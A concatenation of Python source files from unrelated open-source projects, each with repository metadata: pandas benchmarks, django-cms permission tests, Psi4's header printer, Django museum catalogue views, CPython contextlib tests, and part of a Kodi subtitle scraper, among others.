def setup(self, offset):
N = 1000
        self.data = pd.date_range(start='1/1/2000', periods=N, freq='T')
def time_add_offset(self, offset):
self.data + offset
class OffestDatetimeArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.date = datetime(2011, 1, 1)
self.dt64 = np.datetime64('2011-01-01 09:00Z')
def time_apply(self, offset):
offset.apply(self.date)
def time_apply_np_dt64(self, offset):
offset.apply(self.dt64)
def time_add(self, offset):
self.date + offset
def time_add_10(self, offset):
self.date + (10 * offset)
def time_subtract(self, offset):
self.date - offset
def time_subtract_10(self, offset):
self.date - (10 * offset)
|
pebble/spacel-provision
|
src/spacel/provision/app/db/base.py
|
Python
|
mit
| 874
| 0
|
import logging
from spacel.provision.app.base_decorator import BaseTemplateDecorator
logger = logging.getLogger('spacel.provision.app.db')
class BaseDbTemplateDecorator(BaseTemplateDecorator):
def __init__(self, ingress):
        super(BaseDbTemplateDecorator, self).__init__()
self._ingress = ingress
def _add_client_resources(self, resources, app_region, port, params,
sg_ref):
        clients = params.get('clients', ())
        ingress_resources = self._ingress.ingress_resources(app_region,
port,
clients,
sg_ref=sg_ref)
logger.debug('Adding %s ingress rules.', len(ingress_resources))
resources.update(ingress_resources)
|
czpython/django-cms
|
cms/tests/test_permmod.py
|
Python
|
bsd-3-clause
| 44,347
| 0.001804
|
# -*- coding: utf-8 -*-
from djangocms_text_ckeditor.models import Text
from django.contrib.admin.sites import site
from django.contrib.admin.utils import unquote
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser, Group, Permission
from django.contrib.sites.models import Site
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils.translation import override as force_language
from cms.api import (add_plugin, assign_user_to_page, create_page,
create_page_user, publish_page)
from cms.admin.forms import save_permissions
from cms.cms_menus import get_visible_nodes
from cms.management.commands.subcommands.moderator import log
from cms.models import Page, CMSPlugin, Title, ACCESS_PAGE
from cms.models.permissionmodels import (ACCESS_DESCENDANTS,
ACCESS_PAGE_AND_DESCENDANTS,
PagePermission,
GlobalPagePermission)
from cms.plugin_pool import plugin_pool
from cms.test_utils.testcases import (URL_CMS_PAGE_ADD, CMSTestCase)
from cms.test_utils.util.context_managers import disable_logger
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from cms.utils.page_permissions import user_can_publish_page, user_can_view_page
def fake_tree_attrs(page):
page.depth = 1
page.path = '0001'
page.numchild = 0
@override_settings(CMS_PERMISSION=True)
class PermissionModeratorTests(CMSTestCase):
"""Permissions and moderator together
Fixtures contains 3 users and 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
        1. `home`:
            - published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- created by super
            - `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
#TODO: Split this test case into one that tests publish functionality, and
#TODO: one that tests permission inheritance. This is too complex.
def setUp(self):
# create super user
self.user_super = self._create_user("super", is_staff=True,
is_superuser=True)
self.user_staff = self._create_user("staff", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_staff, 'publish_page')
self.user_master = self._create_user("master", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_master, 'publish_page')
self.user_slave = self._create_user("slave", is_staff=True,
add_default_permissions=True)
self.user_normal = self._create_user("normal", is_staff=False)
self.user_normal.user_permissions.add(
Permission.objects.get(codename='publish_page'))
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create non global, non staff user
self.user_non_global = self._create_user("nonglobal")
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "col_two.html", "en",
parent=self.master_page, created_by=self.user_super)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_b
page_b = create_page("pageB", "nav_playground.html", "en", created_by=self.user_super)
# Normal user
# it's allowed for the normal user to view the page
assign_user_to_page(page_b, self.user_normal, can_view=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
self.page_b = publish_page(page_b, self.user_super, 'en')
def _add_plugin(self, user, page):
"""
Add a plugin using the test client to check for permissions.
"""
with self.login_user_context(user):
placeholder = page.placeholders.all()[0]
post_data = {
'body': 'Test'
}
endpoint = self.get_add_plugin_uri(placeholder, 'TextPlugin')
response = self.client.post(endpoint, post_data)
self.assertEqual(response.status_code, 302)
return response.content.decode('utf8')
def test_super_can_add_page_to_root(self):
with self.login_user_context(self.user_super):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 200)
def test_master_cannot_add_page_to_root(self):
with self.login_user_context(self.user_master):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_cannot_add_page_to_root(self):
with self.login_user_context(self.user_slave):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_can_add_page_under_slave_home(self):
with self.login_user_context(self.user_slave):
# move to admin.py?
# url = URL_CMS_PAGE_ADD + "?target=%d&position=last-child" % slave_page.pk
# can he even access it over get?
# response = self.client.get(url)
# self.assertEqual(response.status_code, 200)
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# adds user_slave as page moderator for this page
# public model shouldn't be available yet, because of the moderation
# moderators and approval ok?
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertObjectExist(Title.objects, slug="page")
self.assertObjectDoesNotExist(Title.objects.public(), slug="page")
self.assertTrue(user_can_publish_page(self.user_slave, page))
# publish as slave, published
|
lukeolson/crappy
|
utils.py
|
Python
|
bsd-3-clause
| 5,160
| 0.00155
|
import re
import numpy as np
def identify_templates(hfile):
"""
Parameters
----------
hfile : string
.h header file to be parsed
Returns
-------
tdict : dictionary
dictionary of lists
each dictionary is a function
each list identifies the arglist
Notes
-----
The header looks for
template <class I, class T>
void myfunc(const I n, const T a, const T * x, T * y){
...
}
rules:
- 'template' identifies the start of a templated function
- the argument list is limited to
- I: int array
- T: data array
- if *, then pointer type
else, scalar
- multiples of the same type look like I1, I2, ...
- in addition 'const' and 'void'
- in addition operators of the form OP&
- then it makes i, I, t, T, depending on type
"""
types = ['i', 'I', 't', 'T']
with open(hfile, 'rU') as hfid:
text = hfid.read()
temp_iter = re.finditer('template\s*\<', text)
temp_start = [m.start(0) for m in temp_iter]
docst_iter = re.finditer(r'//\s*begin{docstring}', text)
docst_start = [m.start(0) for m in docst_iter]
docst_iter = re.finditer(r'//\s*end{docstring}', text)
docst_end = [m.start(0) for m in docst_iter]
# check begin and end docstrings
    if len(docst_start) != len(docst_end):
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
# each docstring is associated with some template
# each template is not associated with some docstring
# associate the templates with docstring if possible (from docstrong POV)
temp_start = np.array(temp_start)
docst = ['' for t in range(len(temp_start))]
cppcomment = re.compile('^//')
for ms, me in zip(docst_start, docst_end):
if ms >= me:
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
docid = np.where(ms < temp_start)[0][0]
docstring = text[ms:me].splitlines()
pdocstring = []
for d in docstring[1:]: # not the first line
pdocstring.append(cppcomment.sub('', d))
docst[docid] = '\n'.join(pdocstring)
classre = re.compile('template.*<(.+?)>')
funcre = re.compile('template\s*<.*?>(.+?){', re.DOTALL)
argsre = re.compile('(.+?)\s+(.+?)\s*\((.*?)\)', re.DOTALL)
tidre = re.compile('([%s])' % ''.join(types) + '([0-9]+)')
funcs = []
print('[identify_templates] ...parsing %s' % hfile)
k = 0
for tstart in temp_start:
# class list
classes = classre.search(text, tstart).group(1).strip()
# function call
funccall = funcre.search(text, tstart).group(1).strip()
# check classes
classes = re.sub('class', '', classes)
classes = re.sub('typename', '', classes)
classes = re.sub('\s', '', classes).split(',')
for tid in classes:
if len(tid) == 1:
thistype = tid
else:
m = tidre.match(tid)
thistype = m.group(1).strip()
thisnum = m.group(2).strip()
del thisnum
if thistype not in types:
raise ValueError('class type \'%s\' not supported' % thistype +
' in your header file %s' % hfile)
# get the function declaration
m = argsre.match(funccall)
funcret = m.group(1).strip()
funcname = m.group(2).strip()
funcargs = m.group(3).strip()
args = funcargs.split(',')
# mark args, const, type
if len(args[0]) == 0:
args = []
const = []
atype = []
for arg in args:
if 'const ' in arg:
const.append(True)
else:
const.append(False)
arg = arg.replace('const', '').strip()
if ('*' in arg) or ('[]' in arg):
atype.append(arg[0].upper())
else:
atype.append(arg[0].lower())
if funcret == 'void':
spec = 'v'
else:
spec = funcret
for c, t in zip(const, atype):
if c:
spec += t
else:
spec += '*' + t
funcs.append({'func': funcname, 'const': const, 'atype': atype,
'ret': funcret, 'spec': spec,
'docstring': docst[k]})
print('\t...found %s(...)' % funcname)
k += 1
return funcs
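# Illustrative example: for a header containing
#   template <class I, class T>
#   void myfunc(const I n, const T a, const T * x, T * y){ ... }
# the entry for myfunc has ret 'void', atype ['i', 't', 'T', 'T'],
# const [True, True, True, False] and spec 'vitT*T' ('v' for the void
# return; '*' marks the non-const, writable pointer argument).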
if __name__ == '__main__':
import sys
if len(sys.argv) == 1:
import os
temps = os.listdir('./templates')
example_templates = [h for h in temps
if (h.startswith('example') and h.endswith('.h'))]
        example_templates = ['example.h']
        funcs = identify_templates(os.path.join('./templates', example_templates[0]))
else:
f = sys.argv[1]
funcs = identify_templates(f)
for func in funcs:
print(func['func'])
print(' %s' % func['spec'])
|
GETLIMS/LIMS-Backend
|
lims/projects/migrations/0011_auto_20160822_1527.py
|
Python
|
mit
| 415
| 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0010_product_design_format'),
]
operations = [
migrations.AlterField(
model_name='product',
name='design',
field=models.TextField(null=True, blank=True),
),
]
|
kratman/psi4public
|
psi4/header.py
|
Python
|
gpl-2.0
| 2,628
| 0.003425
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import datetime
import os
from . import core
from .metadata import __version__, version_formatter
time_string = datetime.datetime.now().strftime('%A, %d %B %Y %I:%M%p')
pid = os.getpid()
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def print_header():
driver_info = version_formatter("""{version} {release}""")
git_info = version_formatter("""{{{branch}}} {githash} {clean}""")
datadir = core.get_environment("PSIDATADIR")
memory = sizeof_fmt(core.get_memory())
threads = str(core.get_num_threads())
header = """
-----------------------------------------------------------------------
Psi4: An Open-Source Ab Initio Electronic Structure Package
Psi4 %s
Git: Rev %s
R. M. Parrish, L. A. Burns, D. G. A. Smith, A. C. Simmonett,
    A. E. DePrince III, E. G. Hohenstein, U. Bozkaya, A. Yu. Sokolov,
R. Di Remigio, R. M. Richard, J. F. Gonthier, A. M. James,
    H. R. McAlexander, A. Kumar, M. Saitow, X. Wang, B. P. Pritchard,
P. Verma, H. F. Schaefer III, K. Patkowski, R. A. King, E. F. Valeev,
F. A. Evangelista, J. M. Turney, T. D. Crawford, and C. D. Sherrill,
submitted.
-----------------------------------------------------------------------
Psi4 started on: %s
Process ID: %6d
PSIDATADIR: %s
Memory: %s
Threads: %s
""" % (driver_info, git_info, time_string, pid, datadir, memory, threads)
core.print_out(header)
|
mbranko/kartonpmv
|
osnovni/views.py
|
Python
|
mit
| 9,507
| 0.001367
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from dateutil import relativedelta
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect
from django.db.models import Q, Count
from django_tables2 import RequestConfig
from osnovni.forms import PredmetForm, PredmetSearchForm
from osnovni.models import *
from osnovni.tables import *
@login_required
def index(request):
return render(request, 'osnovni/index.html')
@login_required
def novi_predmet(request):
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
else:
form = PredmetForm(initial={'kreirao': request.user.radnik, 'datum_kreiranja': datetime.date.today()})
context = {'form': form,
'pagetitle': u'Novi karton',
'maintitle': u'Novi karton',
'titleinfo': u'Kreiranje novog kartona',
'form_mode': 'new'}
return render(request, 'osnovni/predmet.html', context)
@login_required
def predmet(request, predmet_id):
try:
pred = MuzejskiPredmet.objects.get(pk=predmet_id)
except MuzejskiPredmet.DoesNotExist:
return redirect('index')
template = 'osnovni/predmet.html'
context = {}
context['pagetitle'] = u'Pregled kartona'
context['maintitle'] = u'Pregled kartona'
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
context['form_mode'] = 'edit'
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES, instance=pred)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
    else:
        form = PredmetForm(instance=pred)
if request.user.radnik.uloga.id > 2:
context['predmet'] = pred
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
template = 'osnovni/predmet_view.html'
istorija = IstorijaIzmenaPredmeta.objects.filter(predmet=pred).order_by('timestamp')
table = PredmetHistoryList(istorija)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context['form'] = form
context['table'] = table
return render(request, template, context)
@login_required
def pretraga(request):
if request.method == 'POST':
form = PredmetSearchForm(request.POST)
if form.is_valid():
query = None
query_desc = ''
inv_br = form.cleaned_data['inv_br']
if inv_br is not None and inv_br != '':
q = Q(inv_broj=inv_br)
query = query & q if query is not None else q
query_desc += ' inv.br:' + str(inv_br)
vrsta_predmeta = form.cleaned_data['vrsta_predmeta']
if vrsta_predmeta is not None and vrsta_predmeta != '':
q = Q(vrsta_predmeta__icontains=vrsta_predmeta)
query = query & q if query is not None else q
query_desc += ' predmet:' + vrsta_predmeta
vrsta_zbirke = form.cleaned_data['vrsta_zbirke']
if vrsta_zbirke is not None:
q = Q(vrsta_zbirke_id=vrsta_zbirke.id)
query = query & q if query is not None else q
query_desc += ' zbirka:' + vrsta_zbirke.naziv
vreme_nastanka = form.cleaned_data['vreme_nastanka']
if vreme_nastanka is not None and vreme_nastanka != '':
q = Q(vreme_nastanka__icontains=vreme_nastanka)
query = query & q if query is not None else q
query_desc += ' vreme:' + vreme_nastanka
datum_nastanka1 = form.cleaned_data['datum_nastanka1']
if datum_nastanka1 is not None:
q = Q(datum_nastanka__gte=datum_nastanka1)
query = query & q if query is not None else q
query_desc += ' od:' + datetime.date.strftime(datum_nastanka1, '%d.%m.%Y.')
datum_nastanka2 = form.cleaned_data['datum_nastanka2']
if datum_nastanka2 is not None:
q = Q(datum_nastanka__lte=datum_nastanka2)
query = query & q if query is not None else q
query_desc += ' do:' + datetime.date.strftime(datum_nastanka2, '%d.%m.%Y.')
mesto_nastanka = form.cleaned_data['mesto_nastanka']
if mesto_nastanka is not None:
q = Q(mesto_nastanka2=mesto_nastanka)
query = query & q if query is not None else q
query_desc += ' mesto:' + mesto_nastanka.naziv
autor = form.cleaned_data['autor']
if autor is not None and autor != '':
q = Q(autor__icontains=autor)
query = query & q if query is not None else q
query_desc += ' autor:' + autor
opis = form.cleaned_data['opis']
if opis is not None and opis != '':
q = Q(opis__icontains=opis)
query = query & q if query is not None else q
query_desc += ' opis:' + opis
kategorija = form.cleaned_data['kategorija']
if kategorija is not None:
q = Q(kategorija=kategorija)
query = query & q if query is not None else q
query_desc += ' kat:' + kategorija.naziv
obradio = form.cleaned_data['obradio']
if obradio is not None and obradio != '':
q = Q(obradio__icontains=obradio)
query = query & q if query is not None else q
query_desc += ' obradio:' + obradio
uneo = form.cleaned_data['uneo']
if uneo is not None:
q = Q(kreirao=uneo)
query = query & q if query is not None else q
query_desc += ' uneo:' + uneo.puno_ime()
datum_unosa1 = form.cleaned_data['datum_unosa1']
if datum_unosa1 is not None:
q = Q(datum_kreiranja__gte=datum_unosa1)
query = query & q if query is not None else q
query_desc += ' unos_od:' + datetime.date.strftime(datum_unosa1, '%d.%m.%Y.')
datum_unosa2 = form.cleaned_data['datum_unosa2']
if datum_unosa2 is not None:
q = Q(datum_kreiranja__lte=datum_unosa2)
query = query & q if query is not None else q
query_desc += ' unos_do:' + datetime.date.strftime(datum_unosa2, '%d.%m.%Y.')
if query is None:
predmeti = MuzejskiPredmet.objects.all()
else:
predmeti = MuzejskiPredmet.objects.filter(query).distinct()
return _prikazi_predmete(request, predmeti, u'Pretraga kartona', u'Rezultati pretrage', query_desc)
else:
form = PredmetSearchForm()
context = {'form': form,
'pagetitle': u'Pretraga kartona',
'maintitle': u'Pretraga kartona',
'titleinfo': u'Unesite poznate podatke'}
return render(request, 'osnovni/pretraga.html', context)
@login_required
def moji_predmeti(request):
predmeti = MuzejskiPredmet.objects.filter(kreirao=request.user.radnik)
return _prikazi_predmete(request, predmeti, u'Moji kartoni', u'Moji kartoni', u'korisnika ' + request.user.username)
def _prikazi_predmete(request, predmeti, pagetitle, maintitle, titleinfo):
table = PredmetList(predmeti)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {'table': table,
'pagetitle': pagetitle,
'maintitle': maintitle,
               'titleinfo': titleinfo}
    return render(request, 'osnovni/predmeti.html', context)  # template name assumed; truncated in source
|
cristicalin/setwall
|
junk/test_copy.py
|
Python
|
gpl-3.0
| 181
| 0.005525
|
import copy
from wpm.filelist import *
f = filelist()
f.load("/home/kman/bin/wpm")
f.get_list()
p = copy.copy(f)
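# copy.copy is shallow, so p and f presumably share the underlying wallpaper
# list; sorting p while randomizing f is what this throwaway test probes.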
p.sort()
f.randomize()
p.get_list()
f.get_list()
p.close()
f.close()
|
jenix21/DarunGrim
|
Src/Scripts/FileManagement/setup.py
|
Python
|
bsd-3-clause
| 361
| 0.108033
|
from distutils.core import setup, Extension
setup(name = "win32ver",
version = "1.0",
maintainer = "Jeong Wook Oh",
maintainer_email = "oh.jeongwook@gmail.com",
description = "Win32 Version Information Retriever",
      ext_modules = [ Extension('win32ver',
sources = ['win32ver.cpp'],
libraries = ['version'],
platforms='x86' ) ]
)
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.2/Lib/test/test_contextlib.py
|
Python
|
mit
| 10,109
| 0.002968
|
"""Unit tests for contextlib.py, and other context managers."""
import sys
import tempfile
import unittest
from contextlib import * # Tests __all__
from test import support
try:
import threading
except ImportError:
threading = None
class ContextManagerTestCase(unittest.TestCase):
def test_contextmanager_plain(self):
state = []
@contextmanager
def woohoo():
state.append(1)
yield 42
state.append(999)
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_finally(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
finally:
state.append(999)
with self.assertRaises(ZeroDivisionError):
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError()
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_no_reraise(self):
@contextmanager
def whee():
yield
ctx = whee()
ctx.__enter__()
# Calling __exit__ should not result in an exception
self.assertFalse(ctx.__exit__(TypeError, TypeError("foo"), None))
def test_contextmanager_trap_yield_after_throw(self):
@contextmanager
def whoo():
try:
yield
except:
yield
ctx = whoo()
ctx.__enter__()
self.assertRaises(
RuntimeError, ctx.__exit__, TypeError, TypeError("foo"), None
)
def test_contextmanager_except(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
except ZeroDivisionError as e:
state.append(e.args[0])
self.assertEqual(state, [1, 42, 999])
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError(999)
self.assertEqual(state, [1, 42, 999])
def _create_contextmanager_attribs(self):
def attribs(**kw):
def decorate(func):
for k,v in kw.items():
setattr(func,k,v)
return func
return decorate
@contextmanager
@attribs(foo='bar')
def baz(spam):
"""Whee!"""
return baz
def test_contextmanager_attribs(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__name__,'baz')
self.assertEqual(baz.foo, 'bar')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_contextmanager_doc_attrib(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__doc__, "Whee!")
class ClosingTestCase(unittest.TestCase):
# XXX This needs more work
def test_closing(self):
state = []
class C:
def close(self):
state.append(1)
x = C()
self.assertEqual(state, [])
with closing(x) as y:
self.assertEqual(x, y)
self.assertEqual(state, [1])
def test_closing_error(self):
state = []
class C:
            def close(self):
state.append(1)
x = C()
self.assertEqual(state, [])
with self.assertRaises(ZeroDivisionError):
with closing(x) as y:
self.assertEqual(x, y)
1 / 0
self.assertEqual(state, [1])
class FileContextTestCase(unittest.TestCase):
def testWithOpen(self):
tfn = tempfile.mktemp()
try:
f = None
with open(tfn, "w") as f:
self.assertFalse(f.closed)
f.write("Booh\n")
self.assertTrue(f.closed)
f = None
with self.assertRaises(ZeroDivisionError):
with open(tfn, "r") as f:
self.assertFalse(f.closed)
self.assertEqual(f.read(), "Booh\n")
1 / 0
self.assertTrue(f.closed)
finally:
support.unlink(tfn)
@unittest.skipUnless(threading, 'Threading required for this test.')
class LockContextTestCase(unittest.TestCase):
def boilerPlate(self, lock, locked):
self.assertFalse(locked())
with lock:
self.assertTrue(locked())
self.assertFalse(locked())
with self.assertRaises(ZeroDivisionError):
with lock:
self.assertTrue(locked())
1 / 0
self.assertFalse(locked())
def testWithLock(self):
lock = threading.Lock()
self.boilerPlate(lock, lock.locked)
def testWithRLock(self):
lock = threading.RLock()
self.boilerPlate(lock, lock._is_owned)
def testWithCondition(self):
lock = threading.Condition()
def locked():
return lock._is_owned()
self.boilerPlate(lock, locked)
def testWithSemaphore(self):
lock = threading.Semaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
def testWithBoundedSemaphore(self):
lock = threading.BoundedSemaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
class mycontext(ContextDecorator):
started = False
exc = None
catch = False
def __enter__(self):
self.started = True
return self
def __exit__(self, *exc):
self.exc = exc
return self.catch
class TestContextDecorator(unittest.TestCase):
def test_contextdecorator(self):
context = mycontext()
with context as result:
self.assertIs(result, context)
self.assertTrue(context.started)
self.assertEqual(context.exc, (None, None, None))
def test_contextdecorator_with_exception(self):
context = mycontext()
with self.assertRaisesRegex(NameError, 'foo'):
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
context = mycontext()
context.catch = True
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorator(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
test()
self.assertEqual(context.exc, (None, None, None))
def test_decorator_with_exception(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
raise NameError('foo')
with self.assertRaisesRegex(NameError, 'foo'):
test()
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorating_method(self):
context = mycontext()
class Test(object):
@context
def method(self, a, b, c=None):
self.a = a
self.b = b
self.c = c
# these tests are for argument passing when used as a decorator
test = Test()
test.method(1, 2)
self.assertEqual(test.a, 1)
self.assertEqual(test.b, 2)
self.assertEqual(test.c, None)
test = Test()
test.method('a', 'b', 'c')
        self.assertEqual(test.a, 'a')
        self.assertEqual(test.b, 'b')
        self.assertEqual(test.c, 'c')
|
cloudera/hue
|
desktop/libs/notebook/src/notebook/management/commands/samples_setup.py
|
Python
|
apache-2.0
| 2,309
| 0.003465
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from django.core.management.base import BaseCommand
from desktop.lib.connectors.models import _get_installed_connectors
from beeswax.management.commands.beeswax_install_examples import Command as EditorCommand
from useradmin.models import User
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
args = '<user>'
help = 'Install examples but do not overwrite them.'
def add_arguments(self, parser):
parser.add_argument(
'--username',
dest='username',
default='hue',
help='Hue username used to execute the command',
)
parser.add_argument(
'--dialect',
dest='dialect',
default=None,
help='Dialect name we want to install the samples, all if not specified',
)
def handle(self, *args, **options):
LOG.info('Installing %s examples as %s' % (options.get('dialect') or 'all', options['username']))
user = User.objects.get(username=options['username'])
dialect = options.get('dialect')
dialects = [
{
'id': connector['id'],
'dialect': connector['dialect']
}
for connector in _get_installed_connectors(category='editor')
if dialect is None or connector['dialect'] == dialect
]
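    # One entry per installed editor connector, narrowed to a single dialect
    # when --dialect is given.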
tables = None
for dialect in dialects:
EditorCommand().handle(
app_name=dialect['dialect'], # Unused?
user=user,
tables=tables,
dialect=dialect['dialect'],
interpreter={'type': dialect['id']}
)
|
AMOboxTV/AMOBox.LegoBuild
|
plugin.video.salts/salts_lib/srt_scraper.py
|
Python
|
gpl-2.0
| 9,410
| 0.004145
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import time
import urllib2
import re
import HTMLParser
import socket
import xbmcvfs
import log_utils
import kodi
from constants import VIDEO_TYPES
from constants import SRT_SOURCE
from constants import USER_AGENT
from db_utils import DB_Connection
MAX_RETRIES = 2
TEMP_ERRORS = [500, 502, 503, 504]
BASE_URL = 'http://www.addic7ed.com'
class SRT_Scraper():
def __init__(self):
self.db_connection = DB_Connection()
def get_tvshow_id(self, title, year=None):
match_title = title.lower()
rows = self.db_connection.get_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE)
if rows:
tvshow_id = rows[0][0]
log_utils.log('Returning local tvshow id: |%s|%s|%s|' % (title, year, tvshow_id), log_utils.LOGDEBUG)
return tvshow_id
html = self.__get_cached_url(BASE_URL, 24)
regex = re.compile('option\s+value="(\d+)"\s*>(.*?)</option')
site_matches = []
for item in regex.finditer(html):
tvshow_id, site_title = item.groups()
# strip year off title and assign it to year if it exists
r = re.search('(\s*\((\d{4})\))$', site_title)
if r:
site_title = site_title.replace(r.group(1), '')
site_year = r.group(2)
else:
site_year = None
# print 'show: |%s|%s|%s|' % (tvshow_id, site_title, site_year)
if match_title == site_title.lower():
if year is None or year == site_year:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, tvshow_id)
return tvshow_id
site_matches.append((tvshow_id, site_title, site_year))
if not site_matches:
return None
elif len(site_matches) == 1:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, site_matches[0][0])
return site_matches[0][0]
else:
# there were multiple title matches and year was passed but no exact year matches found
for match in site_matches:
# return the match that has no year specified
if match[2] is None:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, match[0])
return match[0]
def get_season_subtitles(self, language, tvshow_id, season):
url = BASE_URL + '/ajax_loadShow.php?show=%s&season=%s&langs=&hd=%s&hi=%s' % (tvshow_id, season, 0, 0)
html = self.__get_cached_url(url, .25)
# print html.decode('ascii', 'ignore')
